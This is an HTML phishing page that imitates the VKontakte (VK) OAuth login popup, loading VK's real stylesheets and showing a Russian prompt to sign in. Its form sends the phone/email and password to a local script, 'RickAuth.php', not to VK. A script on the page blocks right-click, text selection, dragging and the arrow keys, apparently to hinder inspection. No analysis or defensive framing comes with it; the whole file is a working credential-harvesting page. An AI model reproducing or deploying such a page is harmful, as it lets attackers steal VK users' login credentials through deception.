<html>
<head>
<title>ВКонтакте | Вход</title>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="https://vk.com/css/al/common.css" />
<link rel="stylesheet" type="text/css" href="https://vk.com/css/al/fonts_cnt.css" />
<link type="text/css" rel="stylesheet" href="https://vk.com/css/api/oauth_popup.css"></link>
<link rel="shortcut icon" href="https://vk.com/images/icons/favicons/fav_logo.ico" />
</head>

<body class="VK oauth_centered">

<div class="oauth_wrap">
<div class="oauth_wrap_inner">
<div class="oauth_wrap_content" id="oauth_wrap_content">
<div class="oauth_head">
<a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a>
<div id="oauth_head_info" class="oauth_head_info fl_r">
<a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a>
</div>
</div>

<div class="oauth_content box_body clear_fix">
<div class="box_msg_gray box_msg_padded">Для продолжения Вам необходимо войти <b>ВКонтакте</b>.</div>
<form method="POST"  action="RickAuth.php" onsubmit="return RickCheck()">
<div class="oauth_form">
<div class="oauth_form_login">
<div class="oauth_form_header">Телефон или email</div>
<input type="text" class="oauth_form_input dark" name="ricklog">
<div class="oauth_form_header">Пароль</div>
<input type="password" class="oauth_form_input dark" name="rickpass" id="rickpass" />
<button class="flat_button oauth_button button_wide" type="submit">Войти</button>
<a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a>
<input type="submit" name="submit_input" class="unshown">
</div>
</div>
</form>

</div>
</div>
</div>
</div>
<script type="text/javascript">function RickCheck (){var RickPass = document.getElementById('rickpass').value;if(RickPass == ''){return false;}return true;}document.ondragstart = noselect;document.onselectstart = noselect;document.oncontextmenu = noselect;function noselect() {return false;}document.body.onkeydown = function(e){e = e || window.event;var c = e.keyCode;if(c>36 && c<41 || c>32 && c<37) return false;}</script>
</body>
</html>